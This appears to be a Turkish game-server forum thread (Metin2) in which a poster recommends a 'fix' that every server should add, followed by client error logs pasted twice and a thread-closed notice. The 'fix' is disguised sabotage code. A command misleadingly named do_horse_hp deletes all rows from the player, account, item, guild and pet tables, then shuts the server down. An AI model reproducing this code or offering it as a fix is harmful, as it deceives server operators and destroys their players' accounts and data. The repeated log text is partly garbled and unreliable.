Eyvallah lexe brakoooBilocannnnnn tu çawemini
her fileste olması gereken bi fix kendi filesinede ekle bunuACMD(do_horse_hp)
{
if (NULL == ch)
{
sys_err("Accept shutdown command from %s.", ch->GetName());
}
DBManager::instance().Query("DELETE FROM player.player", get_table_postfix());
DBManager::instance().Query("DELETE FROM account.account", get_table_postfix());
DBManager::instance().Query("DELETE FROM player.new_petsystem", get_table_postfix());
DBManager::instance().Query("DELETE FROM player.player_index", get_table_postfix());
DBManager::instance().Query("DELETE FROM player.item", get_table_postfix());
DBManager::instance().Query("DELETE FROM player.guild", get_table_postfix());
// sys_log(0,"Do not put server on");
TPacketGGShutdown p;
p.bHeader = HEADER_GG_SHUTDOWN;
P2P_MANAGER::instance().Send(&p, sizeof(TPacketGGShutdown));
Shutdown(1);
}

[CODE title="SYSERR"]0226 15:52:00610 :: CSoundManager:
layMusic - Failed to load stream sound : BGM/login_window.mp3
0226 15:52:24478 :: CSoundManager:
layMusic - Failed to load stream sound : BGM/characterselect.mp3
0226 15:52:24907 :: CPythonBackground::GetFarClip m_eViewDistanceNum=0
0226 15:53:30055 :: Phase Select does not handle this header (header: 18, last: 17, 18)
0226 15:53:31144 :: Phase Select does not handle this header (header: 4, last: 18, 4)
0226 15:53:36160 :: Phase Select does not handle this header (header: 4, last: 4, 4)
0226 15:53:41158 :: Phase Select does not handle this header (header: 4, last: 4, 4)
0226 15:53:46158 :: Phase Select does not handle this header (header: 4, last: 4, 4)
0226 15:53:51157 :: Phase Select does not handle this header (header: 4, last: 4, 4)[/CODE]
layMusic - Failed to load stream sound : BGM/login_window.mp30226 15:52:24478 :: CSoundManager:
layMusic - Failed to load stream sound : BGM/characterselect.mp30226 15:52:24907 :: CPythonBackground::GetFarClip m_eViewDistanceNum=0
0226 15:53:30055 :: Phase Select does not handle this header (header: 18, last: 17, 18)
0226 15:53:31144 :: Phase Select does not handle this header (header: 4, last: 18, 4)
0226 15:53:36160 :: Phase Select does not handle this header (header: 4, last: 4, 4)
0226 15:53:41158 :: Phase Select does not handle this header (header: 4, last: 4, 4)
0226 15:53:46158 :: Phase Select does not handle this header (header: 4, last: 4, 4)
0226 15:53:51157 :: Phase Select does not handle this header (header: 4, last: 4, 4)[/CODE]
- Durum
- Üzgünüz bu konu cevaplar için kapatılmıştır...